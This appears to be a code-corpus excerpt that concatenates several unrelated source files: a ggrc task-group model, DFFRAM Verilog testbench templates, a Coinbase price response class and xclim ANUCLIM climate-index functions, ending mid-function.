with self.assertRaises(ValueError):
cmac.train(X_train=True, y_train=True,
X_test=None, y_test=True)
| 2.171875 | 2 |
src/ggrc_workflows/models/task_group_object.py | Smotko/ggrc-core | 0 | 3396 | # Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: <EMAIL>
# Maintained By: <EMAIL>
from sqlalchemy.ext.associationproxy import association_proxy
from ggrc import db
from ggrc.models.mixins import Mapping
from ggrc.models.mixins import Timeboxed
from ggrc.models.reflection import PublishOnly
class TaskGroupObject(Timeboxed, Mapping, db.Model):
__tablename__ = 'task_group_objects'
task_group_id = db.Column(
db.Integer, db.ForeignKey('task_groups.id'), nullable=False)
object_id = db.Column(db.Integer, nullable=False)
object_type = db.Column(db.String, nullable=False)
@property
def object_attr(self):
return '{0}_object'.format(self.object_type)
@property
def object(self):
return getattr(self, self.object_attr)
@object.setter
def object(self, value):
self.object_id = value.id if value is not None else None
self.object_type = value.__class__.__name__ if value is not None \
else None
return setattr(self, self.object_attr, value)
@staticmethod
def _extra_table_args(cls):
return (
db.UniqueConstraint('task_group_id', 'object_id', 'object_type'),
db.Index('ix_task_group_id', 'task_group_id'),
)
_publish_attrs = [
'task_group',
'object',
]
_sanitize_html = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupObject, cls).eager_query()
return query.options(
orm.subqueryload('task_group'))
def _display_name(self):
return self.object.display_name + '<->' + self.task_group.display_name
def copy(self, _other=None, **kwargs):
columns = [
'task_group', 'object_id', 'object_type'
]
target = self.copy_into(_other, columns, **kwargs)
return target
class TaskGroupable(object):
@classmethod
def late_init_task_groupable(cls):
def make_task_group_objects(cls):
cls.task_groups = association_proxy(
'task_group_objects', 'task_group',
creator=lambda task_group: TaskGroupObject(
task_group=task_group,
object_type=cls.__name__,
)
)
joinstr = 'and_(foreign(TaskGroupObject.object_id) == {type}.id, '\
'foreign(TaskGroupObject.object_type) == "{type}")'
joinstr = joinstr.format(type=cls.__name__)
return db.relationship(
'TaskGroupObject',
primaryjoin=joinstr,
backref='{0}_object'.format(cls.__name__),
cascade='all, delete-orphan',
)
cls.task_group_objects = make_task_group_objects(cls)
_publish_attrs = [
PublishOnly('task_groups'),
'task_group_objects',
]
_include_links = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupable, cls).eager_query()
return cls.eager_inclusions(query, TaskGroupable._include_links).options(
orm.subqueryload('task_group_objects'))
| 1.898438 | 2 |
verification/tb_template.py | ahmednofal/DFFRAM | 0 | 3397 | # Copyright ©2020-2021 The American University in Cairo and the Cloud V Project.
#
# This file is part of the DFFRAM Memory Compiler.
# See https://github.com/Cloud-V/DFFRAM for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
RAM_instantiation = """
/*
An auto generated testbench to verify RAM{word_num}x{word_size}
Authors: <NAME> (<EMAIL>)
<NAME> (<EMAIL>)
*/
`define VERBOSE_1
`define VERBOSE_2
`define UNIT_DELAY #1
`define USE_LATCH 1
`define SIZE {word_size}/8
//`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/primitives.v"
//`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/sky130_fd_sc_hd.v"
// // Temporary override: IcarusVerilog cannot read these for some reason ^
`include "hd_primitives.v"
`include "hd_functional.v"
`include "{filename}"
module tb_RAM{word_num}x{word_size};
localparam SIZE = `SIZE;
localparam A_W = {addr_width}+$clog2(SIZE);
localparam M_SZ = 2**A_W;
reg CLK;
reg [(SIZE-1):0] WE0;
reg EN0;
reg [(SIZE*8-1):0] Di0;
wire [(SIZE*8-1):0] Do0;
reg [A_W-1:0] A0, ADDR;
reg [7:0] Phase;
reg [7:0] RANDOM_BYTE;
event done;
RAM{word_num} #(.USE_LATCH(`USE_LATCH), .WSIZE(SIZE)) SRAM (
.CLK(CLK),
.WE0(WE0),
.EN0(EN0),
.Di0(Di0),
.Do(Do0),
.A0(A0[A_W-1:$clog2(SIZE)])
);
initial begin
$dumpfile("tb_RAM{word_num}x{word_size}.vcd");
$dumpvars(0, tb_RAM{word_num}x{word_size});
@(done) $finish;
end
/* Memory golden Model */
reg [(SIZE*8-1):0] RAM[(M_SZ)-1 : 0];
reg [(SIZE*8-1):0] RAM_DATA_RW;
genvar c;
generate
for (c=0; c < SIZE; c = c+1) begin: mem_golden_model
always @(posedge CLK) begin
if(EN0) begin
RAM_DATA_RW <= RAM[A0/SIZE];
if(WE0[c]) RAM[A0/SIZE][8*(c+1)-1:8*c] <= Di0[8*(c+1)-1:8*c];
end
end
end
endgenerate
"""
begin_single_ported_test = """
initial begin
CLK = 0;
WE0 = 0;
EN0 = 1;
"""
single_ported_custom_test = """
Phase = 0;
// Perform a single word write then read
mem_write_word({{SIZE{{8'h90}}}}, 4);
mem_read_word_0(4);
"""
RAM_instantiation_1RW1R = """
/*
An auto generated testbench to verify RAM{word_num}x{word_size}
Authors: <NAME> (<EMAIL>)
<NAME> (<EMAIL>)
*/
`define VERBOSE_1
`define VERBOSE_2
`define UNIT_DELAY #1
`define USE_LATCH 1
`define SIZE {word_size}/8
//`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/primitives.v"
//`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/sky130_fd_sc_hd.v"
// // Temporary override: IcarusVerilog cannot read these for some reason ^
`include "hd_primitives.v"
`include "hd_functional.v"
`include "{filename}"
module tb_RAM{word_num}x{word_size}_1RW1R;
localparam SIZE = `SIZE;
localparam A_W = {addr_width}+$clog2(SIZE);
localparam M_SZ = 2**A_W;
reg CLK;
reg [(SIZE-1):0] WE0;
reg EN0;
reg ENR;
reg [(SIZE*8-1):0] Di0;
wire [(SIZE*8-1):0] Do0;
wire [(SIZE*8-1):0] Do1;
reg [A_W-1:0] A0, A1, ADDR;
reg [7:0] Phase;
reg [7:0] RANDOM_BYTE;
event done;
RAM{word_num}_1RW1R #(.USE_LATCH(`USE_LATCH), .WSIZE(`SIZE)) SRAM (
.CLK(CLK),
.WE0(WE0),
.EN0(EN0),
.EN1(ENR),
.Di0(Di0),
.Do0(Do0),
.Do1(Do1),
.A0(A0[A_W-1:$clog2(SIZE)]),
.A1(A1[A_W-1:$clog2(SIZE)])
);
initial begin
$dumpfile("tb_RAM{word_num}x{word_size}_1RW1R.vcd");
$dumpvars(0, tb_RAM{word_num}x{word_size}_1RW1R);
@(done) $finish;
end
/* Memory golden Model */
reg [(SIZE*8-1):0] RAM[(M_SZ)-1 : 0];
reg [(SIZE*8-1):0] RAM_DATA_RW;
reg [(SIZE*8-1):0] RAM_DATA_R;
genvar c;
generate
for (c=0; c < SIZE; c = c+1) begin: mem_golden_model
always @(posedge CLK) begin
if(EN0) begin
RAM_DATA_RW <= RAM[A0/SIZE];
if(WE0[c]) RAM[A0/SIZE][8*(c+1)-1:8*c] <= Di0[8*(c+1)-1:8*c];
end
if (ENR) begin
RAM_DATA_R <= RAM[A1/SIZE];
end
end
end
endgenerate
"""
begin_dual_ported_test = """
initial begin
CLK = 0;
WE0 = 0;
EN0 = 1;
ENR = 1;
"""
dual_ported_custom_test = """
Phase = 0;
// Perform a 2 word write then read 2 words
mem_write_word({{SIZE{{8'h90}}}}, 4);
mem_write_word({{SIZE{{8'h33}}}}, 8);
mem_read_2words(4,8);
"""
start_test_common = """
always #10 CLK = !CLK;
integer i;
"""
test_port_1RW1R = """
/***********************************************************
Write and read from different ports
************************************************************/
// Fill the memory with a known pattern
// Word Write then Read
Phase = 1;
`ifdef VERBOSE_1
$display("\\nFinished Phase 0, starting Phase 1");
`endif
for(i=0; i<M_SZ; i=i+SIZE) begin
ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFC ;
RANDOM_BYTE = $urandom;
mem_write_word( {SIZE{RANDOM_BYTE}}, ADDR);
mem_read_word_1( ADDR );
end
// HWord Write then Read
Phase = 2;
`ifdef VERBOSE_1
$display("\\nFinished Phase 1, starting Phase 2");
`endif
for(i=0; i<M_SZ; i=i+SIZE/2) begin
ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFE;
RANDOM_BYTE = $urandom;
mem_write_hword( {SIZE/2{RANDOM_BYTE}}, ADDR);
mem_read_word_1( ADDR & {{SIZE-1{8'hFF}}, 8'hFC} );
end
// Byte Write then Read
Phase = 3;
`ifdef VERBOSE_1
$display("\\nFinished Phase 2, starting Phase 3");
`endif
for(i=0; i<M_SZ; i=i+1) begin
ADDR = (($urandom%M_SZ));
mem_write_byte($urandom%255, ADDR);
mem_read_word_1(ADDR & {{SIZE-1{8'hFF}}, 8'hFC} );
end
"""
test_port_RW = """
/***********************************************************
Write and read from same port
************************************************************/
Phase = 4;
`ifdef VERBOSE_1
$display("\\nFinished Phase 3, starting Phase 4");
`endif
for(i=0; i<M_SZ; i=i+SIZE) begin
ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFC ;
RANDOM_BYTE = $urandom;
mem_write_word( {SIZE{RANDOM_BYTE}}, ADDR);
mem_read_word_0( ADDR );
end
// HWord Write then Read
Phase = 5;
`ifdef VERBOSE_1
$display("\\nFinished Phase 4, starting Phase 5");
`endif
for(i=0; i<M_SZ; i=i+SIZE/2) begin
ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFE;
RANDOM_BYTE = $urandom;
mem_write_hword( {SIZE/2{RANDOM_BYTE}}, ADDR);
mem_read_word_0( ADDR & {{SIZE-1{8'hFF}}, 8'hFC} );
end
// Byte Write then Read
Phase = 6;
`ifdef VERBOSE_1
$display("\\nFinished Phase 5, starting Phase 6");
`endif
for(i=0; i<M_SZ; i=i+1) begin
ADDR = (($urandom%M_SZ));
mem_write_byte($urandom%255, ADDR);
mem_read_word_0(ADDR & {{SIZE-1{8'hFF}}, 8'hFC} );
end
$display ("\\n>> Test Passed! <<\\n");
-> done;
"""
end_test = """
end
"""
tasks = """
task mem_write_byte(input [7:0] byte, input [A_W-1:0] addr);
begin
@(posedge CLK);
A0 = addr;//[A_WIDTH:2];
WE0 = (1 << addr[$clog2(SIZE)-1:0]);
Di0 = (byte << (addr[$clog2(SIZE)-1:0] * 8));
@(posedge CLK);
`ifdef VERBOSE_2
$display("WRITE BYTE: 0x%X to %0X(%0D) (0x%X, %B)", byte, addr, addr, Di0, WE0);
`endif
WE0 = {SIZE{8'h00}};
end
endtask
task mem_write_hword(input [SIZE*8-1:0] hword, input [A_W-1:0] addr);
begin
@(posedge CLK);
A0 = addr;//[A_WIDTH:$clog2(SIZE)];
WE0 = {{SIZE/2{addr[$clog2(SIZE)-1]}},{SIZE/2{~addr[$clog2(SIZE)-1]}}};
Di0 = (hword << (addr[$clog2(SIZE)-1] * (SIZE/2)*8));
@(posedge CLK);
`ifdef VERBOSE_2
$display("WRITE HWORD: 0x%X to %0X(%0D) (0x%X, %B)", hword, addr, addr, Di0, WE0);
`endif
WE0 = {SIZE{8'h00}};
end
endtask
task mem_write_word(input [SIZE*8-1:0] word, input [A_W-1:0] addr);
begin
@(posedge CLK);
A0 = addr;
WE0 = {SIZE{8'hFF}};
Di0 = word;
@(posedge CLK);
`ifdef VERBOSE_2
$display("WRITE WORD: 0x%X to %0X(%0D) (0x%X, %B)", word, addr, addr, Di0, WE0);
`endif
WE0 = {SIZE{8'h00}};
end
endtask
task mem_read_word_0(input [A_W-1:0] addr);
begin
@(posedge CLK);
A0 = addr;//[9:2];
WE0 = {SIZE{8'h00}};
@(posedge CLK);
#5;
`ifdef VERBOSE_2
$display("READ WORD: 0x%X from %0D", Do0, addr);
`endif
check0();
end
endtask
task check0; begin
if(RAM_DATA_RW !== Do0) begin
$display("\\n>>Test Failed! <<\\t(Phase: %0d, Iteration: %0d", Phase, i);
$display("Address: 0x%X, READ: 0x%X - Should be: 0x%X", A0, Do0, RAM[A0/SIZE]);
$fatal(1);
end
end
endtask
"""
dual_ported_tasks = """
task mem_read_2words(input [A_W-1:0] addr0,
input [A_W-1:0] addr1);
begin
@(posedge CLK);
A0= addr0;//[9:2];
A1= addr1;//[9:2];
WE0 = {SIZE{8'h00}};
@(posedge CLK);
#5;
`ifdef VERBOSE_2
$display("READ WORD0: 0x%X from %0D", Do0, addr0);
$display("READ WORD1: 0x%X from %0D", Do1, addr1);
`endif
check0();
check1();
end
endtask
task mem_read_word_1(input [A_W-1:0] addr);
begin
@(posedge CLK);
A1 = addr;//[9:2];
WE0 = {SIZE{8'h00}};
@(posedge CLK);
#5;
`ifdef VERBOSE_2
$display("READ WORD: 0x%X from %0D", Do1, addr);
`endif
check1();
end
endtask
task check1; begin
if(RAM_DATA_R !== Do1) begin
$display("\\n>>Test Failed! <<\\t(Phase: %0d, Iteration: %0d", Phase, i);
$display("Address: 0x%X, READ: 0x%X - Should be: 0x%X", A1, Do1, RAM[A1/SIZE]);
$fatal(1);
end
end
endtask
"""
endmodule = """
endmodule
"""
| 1.890625 | 2 |
services/stocks-api/app/api/clients/coinbase/CoinbaseResponse.py | krystianbajno/stocks | 3 | 3398 | <reponame>krystianbajno/stocks<filename>services/stocks-api/app/api/clients/coinbase/CoinbaseResponse.py<gh_stars>1-10
class CoinbaseResponse:
bid = 0
ask = 0
product_id = None
def set_bid(self, bid):
self.bid = float(bid)
def get_bid(self):
return self.bid
def set_ask(self, ask):
self.ask = float(ask)
def get_ask(self):
return self.ask
def get_product_id(self):
return self.product_id
def set_product_id(self, product_id):
self.product_id = product_id
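# A minimal usage sketch (illustrative, hypothetical values; not part of the class above).
# The setters coerce string prices to float, so API payload fields can be passed in directly.
if __name__ == "__main__":
    response = CoinbaseResponse()
    response.set_product_id("BTC-USD")  # hypothetical product id
    response.set_bid("29999.50")
    response.set_ask("30000.10")
    # Spread between ask and bid for the stored product
    print(response.get_product_id(), response.get_ask() - response.get_bid())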
| 2.46875 | 2 |
xclim/indices/_anuclim.py | bzah/xclim | 1 | 3399 | # noqa: D100
from typing import Optional
import numpy as np
import xarray
from xclim.core.units import (
convert_units_to,
declare_units,
pint_multiply,
rate2amount,
units,
units2pint,
)
from xclim.core.utils import ensure_chunk_size
from ._multivariate import (
daily_temperature_range,
extreme_temperature_range,
precip_accumulation,
)
from ._simple import tg_mean
from .generic import select_resample_op
from .run_length import lazy_indexing
# Frequencies : YS: year start, QS-DEC: seasons starting in december, MS: month start
# See http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases
# -------------------------------------------------- #
# ATTENTION: ASSUME ALL INDICES WRONG UNTIL TESTED ! #
# -------------------------------------------------- #
__all__ = [
"temperature_seasonality",
"precip_seasonality",
"tg_mean_warmcold_quarter",
"tg_mean_wetdry_quarter",
"prcptot_wetdry_quarter",
"prcptot_warmcold_quarter",
"prcptot",
"prcptot_wetdry_period",
"isothermality",
]
_xr_argops = {
"wettest": xarray.DataArray.argmax,
"warmest": xarray.DataArray.argmax,
"dryest": xarray.DataArray.argmin,
"driest": xarray.DataArray.argmin,
"coldest": xarray.DataArray.argmin,
}
_np_ops = {
"wettest": "max",
"warmest": "max",
"dryest": "min",
"driest": "min",
"coldest": "min",
}
@declare_units(tasmin="[temperature]", tasmax="[temperature]")
def isothermality(
tasmin: xarray.DataArray, tasmax: xarray.DataArray, freq: str = "YS"
) -> xarray.DataArray:
r"""Isothermality.
The mean diurnal range divided by the annual temperature range.
Parameters
----------
tasmin : xarray.DataArray
Average daily minimum temperature at daily, weekly, or monthly frequency.
tasmax : xarray.DataArray
Average daily maximum temperature at daily, weekly, or monthly frequency.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [%]
Isothermality
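Examples
--------
A minimal usage sketch, assuming `path_to_tasmin_file` and `path_to_tasmax_file` point to
demonstration datasets analogous to those used in the other examples of this module:

>>> import xclim.indices as xci
>>> tn = xr.open_dataset(path_to_tasmin_file).tasmin
>>> tx = xr.open_dataset(path_to_tasmax_file).tasmax
>>> iso = xci.isothermality(tasmin=tn, tasmax=tx, freq='YS')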
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the output with input data with daily frequency as well. As such weekly or monthly input values, if desired, should
be calculated prior to calling the function.
"""
dtr = daily_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
etr = extreme_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
with xarray.set_options(keep_attrs=True):
iso = dtr / etr * 100
iso.attrs["units"] = "%"
return iso
@declare_units(tas="[temperature]")
def temperature_seasonality(tas: xarray.DataArray) -> xarray.DataArray:
r"""ANUCLIM temperature seasonality (coefficient of variation).
The annual temperature coefficient of variation expressed in percent. Calculated as the standard deviation
of temperature values for a given year expressed as a percentage of the mean of those temperatures.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
Returns
-------
xarray.DataArray, [%]
Mean temperature coefficient of variation
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature seasonality:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file).tas
>>> tday_seasonality = xci.temperature_seasonality(t)
>>> t_weekly = xci.tg_mean(t, freq='7D')
>>> tweek_seasonality = xci.temperature_seasonality(t_weekly)
Notes
-----
For this calculation, the mean in degrees Kelvin is used. This avoids the possibility of having to
divide by zero, but it does mean that the values are usually quite small.
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be
calculated prior to calling the function.
"""
tas = convert_units_to(tas, "K")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(tas)
seas.attrs["units"] = "%"
return seas
@declare_units(pr="[precipitation]")
def precip_seasonality(
pr: xarray.DataArray,
) -> xarray.DataArray:
r"""ANUCLIM Precipitation Seasonality (C of V).
The annual precipitation Coefficient of Variation (C of V) expressed in percent. Calculated as the standard deviation
of precipitation values for a given year expressed as a percentage of the mean of those values.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
Units need to be defined as a rate (e.g. mm d-1, mm week-1).
Returns
-------
xarray.DataArray, [%]
Precipitation coefficient of variation
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual precipitation seasonality:
>>> import xclim.indices as xci
>>> p = xr.open_dataset(path_to_pr_file).pr
>>> pday_seasonality = xci.precip_seasonality(p)
>>> p_weekly = xci.precip_accumulation(p, freq='7D')
# Input units need to be a rate
>>> p_weekly.attrs['units'] = "mm/week"
>>> pweek_seasonality = xci.precip_seasonality(p_weekly)
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
If input units are in mm s-1 (or equivalent) values are converted to mm/day to avoid potentially small denominator
values.
"""
# If units in mm/sec convert to mm/days to avoid potentially small denominator
if units2pint(pr) == units("mm / s"):
pr = convert_units_to(pr, "mm d-1")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(pr)
seas.attrs["units"] = "%"
return seas
@declare_units(tas="[temperature]")
def tg_mean_warmcold_quarter(
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the mean temperature of this period is
calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods,
otherwise as 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : str {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate warmest quarter; 'coldest' calculate coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quarter of each year.
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature
warmest quarter mean temperature:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file)
>>> t_warm_qrt = xci.tg_mean_warmcold_quarter(tas=t.tas, op='warmest', src_timestep='D')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
out = _to_quarter(src_timestep, tas=tas)
oper = _np_ops[op]
out = select_resample_op(out, oper, freq)
out.attrs["units"] = tas.units
return out
@declare_units(tas="[temperature]", pr="[precipitation]")
def tg_mean_wetdry_quarter(
tas: xarray.DataArray,
pr: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the mean temperature of this period is calculated.
If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods, otherwise as 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform: 'wettest' calculate for the wettest quarter; 'driest' calculate for the driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quarter of each year.
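Examples
--------
A minimal usage sketch, assuming `path_to_tas_file` and `path_to_pr_file` point to the same
demonstration datasets used in the other examples of this module:

>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file).tas
>>> p = xr.open_dataset(path_to_pr_file).pr
>>> t_wet_qrt = xci.tg_mean_wetdry_quarter(tas=t, pr=p, op='wettest', src_timestep='D')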
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
tas_qrt = _to_quarter(src_timestep, tas=tas)
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
with xarray.set_options(keep_attrs=True):
out = _from_other_arg(criteria=pr_qrt, output=tas_qrt, op=xr_op, freq=freq)
out.attrs = tas.attrs
return out
@declare_units(pr="[precipitation]")
def prcptot_wetdry_quarter(
pr: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the total precipitation of this
period is calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters
are defined as 13 week periods, otherwise as 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform: 'wettest' calculate the wettest quarter; 'driest' calculate the driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation values of the {op} quarter of each year.
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual wettest quarter total precipitation:
>>> from xclim.indices import prcptot_wetdry_quarter
>>> p = xr.open_dataset(path_to_pr_file)
>>> pr_warm_qrt = prcptot_wetdry_quarter(pr=p.pr, op='wettest', src_timestep='D')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
try:
oper = _np_ops[op]
except KeyError:
raise NotImplementedError(
f'Unknown operation "{op}"; must be one of "wettest" or "driest".'
)
out = select_resample_op(pr_qrt, oper, freq)
out.attrs["units"] = pr_qrt.units
return out
@declare_units(pr="[precipitation]", tas="[temperature]")
def prcptot_warmcold_quarter(
pr: xarray.DataArray,
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the total
precipitation of this period is calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters
are defined as 13 week periods, otherwise as 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate for the warmest quarter; 'coldest' calculate for the coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
    Total precipitation values of the {op} quarter of each year.
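Examples
--------
A minimal usage sketch, assuming the same demonstration files as in the other examples of this module:

>>> import xclim.indices as xci
>>> p = xr.open_dataset(path_to_pr_file).pr
>>> t = xr.open_dataset(path_to_tas_file).tas
>>> pr_warm_qrt = xci.prcptot_warmcold_quarter(pr=p, tas=t, op='warmest', src_timestep='D')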
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# determine input data frequency
tas_qrt = _to_quarter(src_timestep, tas=tas)
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
out = _from_other_arg(criteria=tas_qrt, output=pr_qrt, op=xr_op, freq=freq)
out.attrs = pr_qrt.attrs
return out
@declare_units(pr="[precipitation]")
def prcptot(
pr: xarray.DataArray, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Accumulated total precipitation.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation.
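Examples
--------
A minimal usage sketch, assuming `path_to_pr_file` points to the same demonstration dataset
used in the other examples of this module:

>>> import xclim.indices as xci
>>> p = xr.open_dataset(path_to_pr_file).pr
>>> annual_prcptot = xci.prcptot(pr=p, src_timestep='D', freq='YS')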
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well.
"""
pram = rate2amount(pr)
return pram.resample(time=freq).sum(dim="time", keep_attrs=True)
# FIXME: src_timestep is not used here.
@declare_units(pr="[precipitation]")
def prcptot_wetdry_period(
pr: xarray.DataArray, *, op: str, src_timestep: str, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM precipitation of the wettest/driest day, week, or month, depending on the time step.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
op : {'wettest', 'driest'}
Operation to perform: 'wettest' calculate the wettest period; 'driest' calculate the driest period.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation of the {op} period.
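Examples
--------
A minimal usage sketch, assuming `path_to_pr_file` points to the same demonstration dataset
used in the other examples of this module:

>>> import xclim.indices as xci
>>> p = xr.open_dataset(path_to_pr_file).pr
>>> wettest_period_total = xci.prcptot_wetdry_period(pr=p, op='wettest', src_timestep='D')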
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
pram = rate2amount(pr)
if op == "wettest":
return pram.resample(time=freq).max(dim="time", keep_attrs=True)
if op == "driest":
return pram.resample(time=freq).min(dim="time", keep_attrs=True)
raise NotImplementedError(
f'Unknown operation "{op}"; op parameter must be one of "wettest" or "driest".'
)
def _anuclim_coeff_var(arr: xarray.DataArray) -> xarray.DataArray:
"""Calculate the annual coefficient of variation for ANUCLIM indices."""
std = arr.resample(time="YS").std(dim="time")
mu = arr.resample(time="YS").mean(dim="time")
return std / mu
def _from_other_arg(
criteria: xarray.DataArray, output: xarray.DataArray, op, freq: str
) -> xarray.DataArray:
"""Pick values from output based on operation returning an index from criteria.
Parameters
----------
criteria : DataArray
Series on which operation returning index is applied.
output : DataArray
Series to be indexed.
op : func
Function returning an index, for example np.argmin, np.argmax, np.nanargmin, np.nanargmax.
freq : str
Temporal grouping.
Returns
-------
DataArray
Output values where criteria is met at the given frequency.
"""
ds = xarray.Dataset(data_vars={"criteria": criteria, "output": output})
dim = "time"
def get_other_op(dataset):
all_nans = dataset.criteria.isnull().all(dim=dim)
